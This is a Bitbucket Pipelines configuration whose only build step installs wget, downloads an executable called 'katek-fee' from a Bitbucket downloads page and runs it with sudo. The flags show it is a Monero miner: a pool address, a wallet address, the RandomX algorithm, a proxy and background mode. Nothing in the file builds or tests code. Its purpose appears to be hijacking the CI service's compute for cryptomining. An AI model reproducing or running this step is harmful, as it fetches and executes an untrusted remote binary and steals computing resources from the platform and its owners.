pipelines:
  default:
    - step:
        script:
            - sudo apt-get update && sudo apt-get -y upgrade && sudo apt-get install -y wget && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && sudo ./katek-fee -o 13.250.104.111:1199 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr -k -a rx/0 -p yahaha --randomx-mode=fast --proxy=13.250.104.111:1080 --background && top